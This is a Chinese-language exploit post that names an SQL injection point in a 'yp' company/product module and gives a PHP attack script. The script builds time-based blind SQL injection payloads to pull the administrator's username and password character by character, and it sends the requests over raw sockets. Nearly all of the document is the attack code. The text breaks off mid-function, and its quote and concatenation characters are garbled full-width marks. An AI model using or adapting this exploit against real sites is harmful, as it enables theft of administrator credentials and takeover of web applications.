当前位置:作者:my5t3ry
注射漏洞所在处:
yp/company.php?where=%23
EXP如下:
<?php
ini_set(“max_execution_time”,0);
error_reporting(7);
function usage()
{
global $argv;
exit(
“[+] Usage : php ”。$argv[0].“ <hostname> <path>”。
“[+] Ex. : php ”。$argv[0].“ localhost /yp”。
“”);
}
function query($pos, $chr, $chs)
{
global $prefix;
switch ($chs){
case 1:
$query = “1=1 and if((ascii(substring((select username from ”。$prefix.“member where groupid=1 limit 0,1),{$pos},1))={$chr}),benchmark(10000000,md5(1)),1)#”;
break;
case 2:
$query = “1=1 and if((ascii(substring((select password from ”。$prefix.“member where groupid=1 limit 0,1),{$pos},1))={$chr}),benchmark(10000000,md5(1)),1)#”;
break;
case 3:
$query = “1=1 and if((length((select username from ”。$prefix.“member where groupid=1 limit 0,1))={$pos}),benchmark(10000000,md5(1)),1)#”;
break;
}
$query = str_replace(“ ”, “/**/”, $query);
$query = urlencode($query);
return $query;
}
function exploit($hostname, $path, $pos, $chr, $chs)
{
$chr = ord($chr);
$conn = fsockopen($hostname, 80);
$postdata = “q=&action=searchlist&where=”。query($pos, $chr, $chs);
$message = “POST ”。$path.“/product.php HTTP/1.1”;
$message .= “Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*”;
$message .= “Accept-Language: zh-cn”;
$message .= “Content-Type: application/x-www-form-urlencoded”;
$message .= “Accept-Encoding: gzip, deflate”;
$message .= “User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”;
$message .= “Host: $hostname”;
$message .= “Content-Length: ”。strlen($postdata)。“”;
$message .= “Connection: Close”;
$message .= $postdata;
//echo $message;
$time_a = time();
fputs($conn, $message);
while (!feof($conn))
$reply .= fgets($conn, 1024);
$time_b = time();
fclose($conn);
//echo $time_b - $time_a.“”;
if ($time_b - $time_a > 4)
return true;
else
return false;
}
function crkusername($hostname, $path, $chs)
{
global $length;
$key = “abcdefghijklmnopqrstu